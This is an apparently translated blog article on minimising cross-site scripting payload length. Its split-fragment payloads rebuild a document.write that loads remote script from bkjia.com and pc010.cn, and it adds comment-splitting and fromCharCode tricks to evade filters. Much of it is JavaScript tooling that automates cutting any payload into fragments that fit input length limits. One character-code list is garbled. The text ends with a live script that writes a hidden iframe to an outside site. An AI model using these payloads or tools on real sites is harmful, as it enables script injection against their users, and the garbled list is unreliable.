What is the shortest cross-site statement? I used to count it like this: the ordinary cross-site code <script>alert("a")</script> comes to 27 characters in total. But then I read the article "Crazy Cross-Site Trip" in the Security Manual, which gives a different way of writing a cross-site statement:
The following is a code snippet:
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script '</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.pc010'</script>
<script>z=z+'.cn/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
Each of these statements is submitted separately (for example, one per input field that has a length limit). As long as all of them are rendered on the same page, in order, the fragments are concatenated into the variable z, and the complete statement becomes:
The following is a code snippet:
document.write("<script src=http://www.bkjia.com/1.js></script>")
Finally, eval(z) runs the contents of z, which completes the cross-site attack. Lcx remarked in that article that the shortest valid fragment is 26 characters, namely <script>z=z+'d"'</script>, so the minimum cross-site length is 26 characters. (While searching for material online today I found that this can be cut by one more character: write <script>z+='d"'</script>, that is, replace z=z+ with z+=, and the fragment comes to 25 characters. Still, it is a bit sad that I can only make progress on the foundation of others! :( ) After I replied to Jianxin, he sent back a smiley. I felt this guy must have found an even shorter cross-site method. /jmdcw/
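As an added example (my code, not the article's and not Lcx's or Jianxin's), here is the accumulation technique above made general: a splitter that cuts any statement into <script>z+='...'</script> fragments that fit a per-field limit, a simulated page that echoes the fragments with other markup between them, and a minimal browser stand-in that runs the inline scripts in document order. The limit, the filler markup, the example.com URL and the fake document/alert objects are assumptions. It also handles three things the fragments above rely on implicitly: the first fragment must assign with z= (z+= on an undefined z would prefix the text "undefined"), no fragment may contain a literal </script, which is why the article splits js></sc and ript>"), and single quotes inside the payload need escaping.

```javascript
// Added example, not code from the original article. Assumptions: the
// per-field limit, the filler markup, the example.com URL, and the fake
// document / alert objects handed to the script runner.

const OPEN_TAG = "<script>";
const CLOSE_TAG = "</script>";

// Escape the characters that would break a single-quoted JS string literal.
function escapeSingleQuoted(s) {
  return s.replace(/\\/g, "\\\\").replace(/'/g, "\\'");
}

// Cut `payload` into fragments of at most `limit` characters.
// - The first fragment uses `z=`: `z+=` on an undefined z would prepend "undefined".
// - No fragment may contain a literal `</script`: the HTML parser would end the
//   script element there (the article splits it as `js></sc` + `ript>")`).
// - The final `<script>eval(z)</script>` fragment must fit the limit as well.
function splitAccumulating(payload, limit) {
  const tail = OPEN_TAG + "eval(z)" + CLOSE_TAG;
  if (tail.length > limit) throw new Error(`limit ${limit} cannot hold ${tail}`);
  const room = limit - (OPEN_TAG + "z+=''" + CLOSE_TAG).length; // wrapper is 22 chars
  if (room < 1) throw new Error("limit too small for even one payload character");
  const fragments = [];
  let rest = payload;
  let first = true;
  while (rest.length > 0) {
    let take = Math.min(room, rest.length);
    let chunk;
    for (;;) {
      chunk = escapeSingleQuoted(rest.slice(0, take));
      if (chunk.length <= room && !/<\/script/i.test(chunk)) break;
      if (take === 1) throw new Error(`cannot fit ${JSON.stringify(rest[0])} within limit ${limit}`);
      take--; // escaping grew the chunk, or it would close the script element
    }
    fragments.push(`${OPEN_TAG}z${first ? "=" : "+="}'${chunk}'${CLOSE_TAG}`);
    rest = rest.slice(take);
    first = false;
  }
  fragments.push(tail);
  return fragments;
}

// The vulnerable page echoes each field in order with other markup between them.
function renderPage(fragments, filler) {
  return fragments.join(filler);
}

// Browser stand-in: run each inline script in document order. `z` is passed
// from one script to the next the way a shared global would be; `globals`
// supplies fake objects (document, alert, ...) the payload may call.
function runInlineScripts(html, globals) {
  const names = Object.keys(globals);
  const values = names.map(n => globals[n]);
  let z;
  for (const [, body] of html.matchAll(/<script>([\s\S]*?)<\/script>/gi)) {
    z = new Function(...names, "z", `${body}\nreturn z;`)(...values, z);
  }
  return z;
}

// Constructed demo inputs: the target statement (placeholder URL) and the
// markup a table-based page would emit between two fields.
const TARGET = 'document.write("<script src=http://www.example.com/1.js></script>")';
const FILLER = "</td></tr><tr><td>";

function demo(limit) {
  const fragments = splitAccumulating(TARGET, limit);
  const written = [];
  const fakeDocument = { write: s => written.push(s) };
  const z = runInlineScripts(renderPage(fragments, FILLER), { document: fakeDocument });
  return { fragments, longest: Math.max(...fragments.map(f => f.length)), z, written };
}

console.log(demo(26).fragments.join("\n"));
```

Counted without trailing semicolons, <script>eval(z)</script> is 24 characters, so the splitter refuses any smaller limit; the carrier fragments themselves shrink to one payload character each.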
Sure enough: today I opened the phpwind vulnerability article in the ninth issue of the Security Manual (for some reason I had not read the magazine carefully for a long time), and it gives an even shorter cross-site code:
The following is a code snippet:
<script>open(/*
*/"http://127"/*
*/+".0.0.1/"/*
*/)</script>
Here /* and */ are JavaScript comment delimiters, and the fragments are again submitted separately. The condition is the same: they must all be rendered on one page, in order. Everything the page emits between two fragments falls inside a comment and is ignored by the script engine, like this:
<script>open(/* irrelevant content, not executed */"http://127"/* irrelevant content, not executed */+".0.0.1/"/* irrelevant content, not executed */)</script>
So what is the shortest statement? It seems that <script> itself cannot be split. Apart from that, names built into the script engine, such as open, cannot be broken across two fragments and still run. /jmdcw
First, take the statement from the top:
The following is a code snippet:
document.write("<script src=http://www.bkjia.com/1.js></script>"); converted to decimal character codes:
100,111,99,117,109,101,110,116,46,119,114,105,116,101,60,115,99,114,105,112,116,32,115,114,104,116,116,112,47,119,119,119,46,112,106,115,47,115,99,114,105,112,116,62,34,41,59
(The list as reproduced here has lost a number of characters, for example the (" after write, the c= of src=, and part of the host name, so generate the codes from the statement with charCodeAt rather than copying this list.)
Then wrap it in eval(String.fromCharCode(...)) to execute it: <script>eval(String.fromCharCode(100,111,99,...,41,59))</script>
Now split it using Jianxin's method:
<script>/*
*/eval(/*
*/String/*
*/./*
*/fromCharCode/*
*/(100,/*
*/111,99,/*
*/......./*
*/59))/*
*/</script>
The longest fragment here is */fromCharCode/*, 16 characters. Because fromCharCode is a name built into the script engine and cannot be split, the smallest cross-site fragment is determined by the longest function name the payload has to use.
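The following added example (my code, not the article's) generalizes the comment-splitting technique used for both the open("http://127"+".0.0.1/") payload and the eval(String.fromCharCode(...)) payload above. It tokenizes a statement into pieces that cannot be split (identifiers, numbers, string literals, single punctuation characters), packs them into */.../* fragments under a per-field limit, reports the longest indivisible token, which is the floor described above, then renders a page with other content between the fragments and shows that the script engine ignores that content. The 16-character limit, the filler, the example.com URL and the fake open/document objects are assumptions; the character codes are generated with charCodeAt rather than typed by hand.

```javascript
// Added example, not the article's code. Assumptions: a 16-character
// per-field limit, the filler markup below, the example.com URL, and fake
// open() / document objects handed to the reassembled script.

// Split a statement into pieces that must stay whole: identifiers, numbers,
// string literals and single punctuation characters. Whitespace is dropped,
// so this handles expression-style payloads, not keywords such as `new` or
// `typeof` that need a space after them.
function tokenize(src) {
  return src.match(/[A-Za-z_$][\w$]*|\d+|"[^"]*"|'[^']*'|\S/g) || [];
}

// Pack tokens greedily into `*/tokens/*` fragments of at most `limit`
// characters. The longest single token fixes the smallest usable limit:
// a built-in name like fromCharCode cannot be broken across two fields.
function splitWithComments(src, limit) {
  const tokens = tokenize(src);
  const longest = tokens.reduce((best, t) => (t.length > best.length ? t : best), "");
  const floor = ("*/" + longest + "/*").length;
  if (floor > limit) {
    throw new Error(`limit ${limit} is below the floor ${floor} set by token ${longest}`);
  }
  const middle = [];
  let cur = "";
  for (const t of tokens) {
    if (cur !== "" && ("*/" + cur + t + "/*").length > limit) {
      middle.push("*/" + cur + "/*");
      cur = "";
    }
    cur += t;
  }
  middle.push("*/" + cur + "/*");
  // First fragment opens the script element, last one closes it.
  const frags = ["<script>/*", ...middle, "*/</script>"];
  const over = frags.find(f => f.length > limit);
  if (over) throw new Error(`fragment ${over} exceeds limit ${limit}`);
  return { frags, floor, longest };
}

// Render the vulnerable page: fields echoed in order with other markup between.
// The filler must not itself contain `*/` or `</script`.
function renderPage(frags, filler) {
  return frags.join(filler);
}

// What the JS engine actually parses: the <script> body with every
// /* ... */ comment, filler included, removed.
function effectiveScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/i.exec(html);
  if (!m) throw new Error("no script element found");
  return m[1].replace(/\/\*[\s\S]*?\*\//g, "");
}

// eval(String.fromCharCode(...)) form of a statement: only letters, digits,
// commas and parentheses remain, so the fields need no quotes or angle brackets.
function toCharCodePayload(statement) {
  const codes = Array.from(statement, ch => ch.charCodeAt(0)).join(",");
  return `eval(String.fromCharCode(${codes}))`;
}

const LIMIT = 16; // assumed per-field limit, equal to the */fromCharCode/* fragment
const FILLER = "</td><td>irrelevant content</td><td>"; // constructed stand-in for page markup

// The open("http://127"+".0.0.1/") payload from the article.
function demoOpen() {
  const { frags } = splitWithComments('open("http://127"+".0.0.1/")', LIMIT);
  const body = effectiveScript(renderPage(frags, FILLER));
  const opened = [];
  new Function("open", body)(url => opened.push(url)); // fake window.open
  return { frags, body, opened };
}

// The document.write(...) payload encoded with fromCharCode; example.com is a placeholder.
function demoCharCode() {
  const statement = 'document.write("<script src=http://www.example.com/1.js></script>");';
  const payload = toCharCodePayload(statement);
  const { frags, floor, longest } = splitWithComments(payload, LIMIT);
  const body = effectiveScript(renderPage(frags, FILLER));
  const written = [];
  new Function("document", body)({ write: s => written.push(s) }); // fake document
  return { frags, floor, longest, payload, body, written };
}

console.log(demoOpen().frags.join("\n"));
console.log(demoCharCode().frags.slice(0, 8).join("\n") + "\n...");
```

Lowering LIMIT below 16 makes splitWithComments throw, naming fromCharCode as the token that sets the floor; the open() payload's own floor is the 12-character string literal "http://127", which is exactly the */"http://127"/* fragment the article shows.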
<script>
document.write('<iframe src="http://www.bkjia.com" style="display:none">');
</script>